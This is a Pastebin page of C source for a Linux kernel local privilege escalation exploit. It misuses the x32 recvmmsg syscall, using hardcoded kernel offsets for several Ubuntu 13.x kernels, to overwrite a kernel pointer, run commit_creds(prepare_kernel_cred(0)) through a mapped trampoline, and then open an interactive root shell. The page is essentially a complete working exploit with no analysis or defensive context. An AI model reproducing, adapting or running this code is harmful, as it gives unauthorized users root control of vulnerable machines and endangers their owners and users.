API tools faq
paste
amiralbenz

1

amiralbenz
Aug 28th, 2015
124
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.69 KB | None | 0 0
raw download clone embed print report
  1. #define _GNU_SOURCE
  2. #include <netinet/ip.h>
  3. #include <stdio.h>
  4. #include <stdlib.h>
  5. #include <string.h>
  6. #include <sys/socket.h>
  7. #include <unistd.h>
  8. #include <sys/syscall.h>
  9. #include <sys/mman.h>
  10. #include <sys/types.h>
  11. #include <sys/stat.h>
  12. #include <fcntl.h>
  13. #include <sys/utsname.h>
  14.  
  15. #define __X32_SYSCALL_BIT 0x40000000
  16. #undef __NR_recvmmsg
  17. #define __NR_recvmmsg (__X32_SYSCALL_BIT + 537)
  18. #define VLEN 1
  19. #define BUFSIZE 200
  20.  
  21. int port;
  22.  
  23. struct offset {
  24. char *kernel_version;
  25. unsigned long dest; // net_sysctl_root + 96
  26. unsigned long original_value; // net_ctl_permissions
  27. unsigned long prepare_kernel_cred;
  28. unsigned long commit_creds;
  29. };
  30.  
  31. struct offset offsets[] = {
  32. {"3.11.0-15-generic",0xffffffff81cdf400+96,0xffffffff816d4ff0,0xffffffff8108afb0,0xffffffff8108ace0}, // Ubuntu 13.10
  33. {"3.11.0-12-generic",0xffffffff81cdf3a0,0xffffffff816d32a0,0xffffffff8108b010,0xffffffff8108ad40}, // Ubuntu 13.10
  34. {"3.8.0-19-generic",0xffffffff81cc7940,0xffffffff816a7f40,0xffffffff810847c0, 0xffffffff81084500}, // Ubuntu 13.04
  35. {NULL,0,0,0,0}
  36. };
  37.  
  38. void udp(int b) {
  39. int sockfd;
  40. struct sockaddr_in servaddr,cliaddr;
  41. int s = 0xff+1;
  42.  
  43. if(fork() == 0) {
  44. while(s > 0) {
  45. fprintf(stderr,"\rbyte %d / 3.. ~%d secs left \b\b\b\b",b+1,3*0xff - b*0xff - (0xff+1-s));
  46. sleep(1);
  47. s--;
  48. fprintf(stderr,".");
  49. }
  50.  
  51. sockfd = socket(AF_INET,SOCK_DGRAM,0);
  52. bzero(&servaddr,sizeof(servaddr));
  53. servaddr.sin_family = AF_INET;
  54. servaddr.sin_addr.s_addr=htonl(INADDR_LOOPBACK);
  55. servaddr.sin_port=htons(port);
  56. sendto(sockfd,"1",1,0,(struct sockaddr *)&servaddr,sizeof(servaddr));
  57. exit(0);
  58. }
  59.  
  60. }
  61.  
  62. void trigger() {
  63. open("/proc/sys/net/core/somaxconn",O_RDONLY);
  64.  
  65. if(getuid() != 0) {
  66. fprintf(stderr,"not root, ya blew it!\n");
  67. exit(-1);
  68. }
  69.  
  70. fprintf(stderr,"w00p w00p!\n");
  71. system("/bin/sh -i");
  72. }
  73.  
  74. typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
  75. typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);
  76. _commit_creds commit_creds;
  77. _prepare_kernel_cred prepare_kernel_cred;
  78.  
  79. // thx bliss
  80. static int __attribute__((regparm(3)))
  81. getroot(void *head, void * table)
  82. {
  83. commit_creds(prepare_kernel_cred(0));
  84. return -1;
  85. }
  86.  
  87. void __attribute__((regparm(3)))
  88. trampoline()
  89. {
  90. asm("mov $getroot, %rax; call *%rax;");
  91. }
  92.  
  93. int main(void)
  94. {
  95. int sockfd, retval, i;
  96. struct sockaddr_in sa;
  97. struct mmsghdr msgs[VLEN];
  98. struct iovec iovecs[VLEN];
  99. char buf[BUFSIZE];
  100. long mmapped;
  101. struct utsname u;
  102. struct offset *off = NULL;
  103.  
  104. uname(&u);
  105.  
  106. for(i=0;offsets[i].kernel_version != NULL;i++) {
  107. if(!strcmp(offsets[i].kernel_version,u.release)) {
  108. off = &offsets[i];
  109. break;
  110. }
  111. }
  112.  
  113. if(!off) {
  114. fprintf(stderr,"no offsets for this kernel version..\n");
  115. exit(-1);
  116. }
  117.  
  118. mmapped = (off->original_value & ~(sysconf(_SC_PAGE_SIZE) - 1));
  119. mmapped &= 0x000000ffffffffff;
  120.  
  121. srand(time(NULL));
  122. port = (rand() % 30000)+1500;
  123.  
  124. commit_creds = (_commit_creds)off->commit_creds;
  125. prepare_kernel_cred = (_prepare_kernel_cred)off->prepare_kernel_cred;
  126.  
  127. mmapped = (long)mmap((void *)mmapped, sysconf(_SC_PAGE_SIZE)*3, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, 0, 0);
  128.  
  129. if(mmapped == -1) {
  130. perror("mmap()");
  131. exit(-1);
  132. }
  133.  
  134. memset((char *)mmapped,0x90,sysconf(_SC_PAGE_SIZE)*3);
  135.  
  136. memcpy((char *)mmapped + sysconf(_SC_PAGE_SIZE), (char *)&trampoline, 300);
  137.  
  138. if(mprotect((void *)mmapped, sysconf(_SC_PAGE_SIZE)*3, PROT_READ|PROT_EXEC) != 0) {
  139. perror("mprotect()");
  140. exit(-1);
  141. }
  142.  
  143. sockfd = socket(AF_INET, SOCK_DGRAM, 0);
  144. if (sockfd == -1) {
  145. perror("socket()");
  146. exit(-1);
  147. }
  148.  
  149. sa.sin_family = AF_INET;
  150. sa.sin_addr.s_addr = htonl(INADDR_LOOPBACK);
  151. sa.sin_port = htons(port);
  152.  
  153. if (bind(sockfd, (struct sockaddr *) &sa, sizeof(sa)) == -1) {
  154. perror("bind()");
  155. exit(-1);
  156. }
  157.  
  158. memset(msgs, 0, sizeof(msgs));
  159.  
  160. iovecs[0].iov_base = &buf;
  161. iovecs[0].iov_len = BUFSIZE;
  162. msgs[0].msg_hdr.msg_iov = &iovecs[0];
  163. msgs[0].msg_hdr.msg_iovlen = 1;
  164.  
  165. for(i=0;i < 3 ;i++) {
  166. udp(i);
  167. retval = syscall(__NR_recvmmsg, sockfd, msgs, VLEN, 0, (void *)off->dest+7-i);
  168. if(!retval) {
  169. fprintf(stderr,"\nrecvmmsg() failed\n");
  170. }
  171. }
  172.  
  173. close(sockfd);
  174.  
  175. fprintf(stderr,"\n");
  176.  
  177. trigger();
  178. }
Advertisement
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!